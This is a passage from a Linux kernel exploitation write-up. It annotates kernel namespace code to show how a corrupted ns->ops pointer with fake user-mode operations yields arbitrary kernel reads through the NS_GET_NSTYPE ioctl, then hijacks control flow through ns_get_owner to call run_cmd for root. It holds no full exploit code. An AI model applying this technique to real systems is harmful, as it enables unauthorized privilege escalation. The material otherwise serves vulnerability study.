189                         unsigned long arg)
190 {        
191         struct user_namespace *user_ns;
192         struct ns_common *ns = get_proc_ns(file_inode(filp));
193         uid_t __user *argp;
194         uid_t uid;
195 
196         switch (ioctl) {
197         case NS_GET_USERNS:
198                 return open_related_ns(ns, ns_get_owner);
199         case NS_GET_PARENT:
200                 if (!ns->ops->get_parent)
201                         return -EINVAL;
202                 return open_related_ns(ns, ns->ops->get_parent);
203         case NS_GET_NSTYPE:
204                 return ns->ops->type;    <---/*现实任意地址读*/
205         case NS_GET_OWNER_UID:
206                 if (ns->ops->type != CLONE_NEWUSER)
207                         return -EINVAL;
208                 user_ns = container_of(ns, struct user_namespace, ns);
209                 argp = (uid_t __user *) arg;
210                 uid = from_kuid_munged(current_user_ns(), user_ns->owner);
211                 return put_user(uid, argp);
212         default:
213                 return -ENOTTY;
214         }
215 }
include/linux/ns_common.h
  9 struct ns_common {
 10         atomic_long_t stashed;
 11         const struct proc_ns_operations *ops;    <---
 12         unsigned int inum;
 13         refcount_t count;
 14 };

Elevate Privileges Through run_cmd

After bypassing address randomization, the next step of privilege escalation can be performed.
  • Read the address of victim net
Read the current task_struct structure through task_list, then read the address of nsproxy on task_struct, and then read the net pointer on nsproxy to achieve.
  • Construct fake ops in user mode
Point the ops pointer to the fake ops

  • Hijack the PC
147 int open_related_ns(struct ns_common *ns,
148                 |  struct ns_common *(*get_ns)(struct ns_common *ns))
149 {
150         struct path path = {};
151         struct file *f;
152         int err;
153         int fd;
154 
155         fd = get_unused_fd_flags(O_CLOEXEC);
156         if (fd < 0)
157                 return fd;
158 
159         do {
160                 struct ns_common *relative;
161 
162                 relative = get_ns(ns);
163                 if (IS_ERR(relative)) {
164                         put_unused_fd(fd);
165                         return PTR_ERR(relative);
166                 }
167 
168                 err = __ns_get_path(&path, relative);
169         } while (err == -EAGAIN);
170 
171         if (err) {
172                 put_unused_fd(fd);
173                 return err;
174         }
175 
176         f = dentry_open(&path, O_RDONLY, current_cred());
177         path_put(&path);
178         if (IS_ERR(f)) {
179                 put_unused_fd(fd);
180                 fd = PTR_ERR(f);
181         } else
182                 fd_install(fd, f);
183 
184         return fd;
185 }
The owner is the last PC hijacked, and the data of ns can also be controlled, so run_cmd can be executed to complete privilege escalation.
1371 struct ns_common *ns_get_owner(struct ns_common *ns)
1372 {
1373         struct user_namespace *my_user_ns = current_user_ns();
1374         struct user_namespace *owner, *p;
1375 
1376         /* See if the owner is in the current user namespace */
1377         owner = p = ns->ops->owner(ns);    <---/*劫持PC*/
1378         for (;;) {
1379                 if (!p)
1380                         return ERR_PTR(-EPERM);
1381                 if (p == my_user_ns)
1382                         break;
1383                 p = p->parent;
1384         }
1385 
1386         return &get_user_ns(owner)->ns;
1387 }
16 struct proc_ns_operations {
 17         const char *name;
 18         const char *real_ns_name;
 19         int type;
 20         struct ns_common *(*get)(struct task_struct *task);
 21         void (*put)(struct ns_common *ns);
 22         int (*install)(struct nsset *nsset, struct ns_common *ns);
 23         struct user_namespace *(*owner)(struct ns_common *ns);    <---
 24         struct ns_common *(*get_parent)(struct ns_common *ns);
 25 } __randomize_layout;

Reference link